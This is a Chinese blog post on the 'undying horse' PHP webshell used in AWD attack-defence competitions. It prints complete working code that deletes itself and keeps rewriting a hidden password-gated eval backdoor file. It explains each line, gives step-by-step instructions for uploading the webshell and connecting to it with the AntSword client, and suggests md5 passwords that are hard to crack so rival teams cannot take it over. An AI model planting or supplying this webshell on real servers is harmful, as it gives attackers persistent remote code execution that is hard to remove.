AWD

不死马的原理和利用

vFREE
2021-03-31 / 0 评论 / 530 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2021年12月08日,已超过291天没有更新,若内容或图片失效,请留言反馈。

黄沙百战穿金甲,不破楼兰终不还。

——王昌龄《从军行》

 


 

何谓不死马,顾名思义就是不死,不死马广泛应用与AWD中或者其他的维持权限的手法中,不死马简直就是一句话木马的升级版本,一句话木马和不死马相比较起来,安全性做的很GOOD!!!

在以往的一句话木马中,密码简单方便呈现给了用户,如果在AWD中,知道了密码的话,就可以反手打一波其他的主机,因为如果是被批量种马的话,所有人都一样,这也就是"骑马",在很多场比赛中,我的队伍(自由公式)都是利用一句话木马去反打其他的队伍一波


不死马原型

<?php
ignore_user_abort(true);
    set_time_limit(0);
    @unlink(__FILE__);
    $file = '.ZYGS.php';
    $code = '<?php if(md5($_GET["zygs"])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_POST["ZYGS"]);}?>';
    while (1){
        file_put_contents($file,$code);
        usleep(5000);
    }
?>

解析

ignore_user_abort(true);   //设置与远程客户端断开后是否继续执行脚本,true即不断开

set_time_limit(0);   //设置脚本最大的执行时间,0即没有时间限制

@unlink(__FILE__);   //删除文件本身

$file = '.ZYGS.php';   //文件名是.ZYGS.php

$code = <?php ?>;   //php代码

file_get_contents($file,$code);   //打开$file文件,然后写入$code

usleep(5000);   //每隔usleep(5000)写入一个新文件

 


unlink就是为了删除传入的不死马文件,避免一些不必要的信息泄露出去,$file中可以规定你要不断生成的文件名,usleep(time)是生成木马的时间,这也是不死马的灵魂之一,通过不断生成文件在当前目录下,形成了不死马,不死马是一个进程,所以往往要重启主机或重启服务才能kill掉,当然,也可以条件竞争

<?php if(md5($_GET["zygs"])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_POST["ZYGS"]);}?>

这段代码是为了防止骑马(乌鸦坐飞机),通过判断用户传入的变量,然后转换成md5值和e10adc3949ba59abbe56e057f20f883e进行对比,如果e10adc3949ba59abbe56e057f20f883e解密出来的值和用户传入的值是一样的话,就继续执行@eval($_POST['ZYGS']),这也是整个不死马中的灵魂,就是为了防止乌鸦坐飞机,一个人拿分

(e10adc3949ba59abbe56e057f20f883e == 123456)

你不讲武德表情包


"食"用方法

服务器IP:123.321.123.321

文件名:.zygs.php

路径:123.321.123.321/upload/

 

当不死马成功上传到服务器之后,访问文件路径 123.321.123.321/upload/.zygs.php,此时已经开始生成不死马.ZYGS.php了,并且传入的.zygs.php已经被unlink删除

然后打开蚁剑,输入123.321.123.321/upload/.ZYGS.php?zygs=123456,密码就是ZYGS,直接连接就完事了


为了防止乌鸦坐飞机,md5值可以用一些在线网站破解不出来的明文

比如说:

qwefgh == bad6f5e2b87ed9ff582334de61f17312

wellmd5 == 10bfc254c3d93fc3761f51ba40f8d4b9

......

$file后面的值设置成你要生成的文件名,连接也是用这个文件名字,就好像是.ZYGS.php


经过md5值的加密,以及不断生成木马文件,便成为了维持权限的好物,在bugku的AWD中,给种下不死马的话,要么重启服务,要么重启机器,要么进行条件竞争,再要么就去kill进程,重启服务再bugku的AWD中不太现实,毕竟没有权限,重启机器还是可以的,100分一次,条件竞争的话,还没有试过,也不知道不死马隔多久生成一个,kill进程的话,kill不完的

 

注:部分图片源自于网络,如有侵权,请联系删除!!!谢谢

1

评论 (0)

取消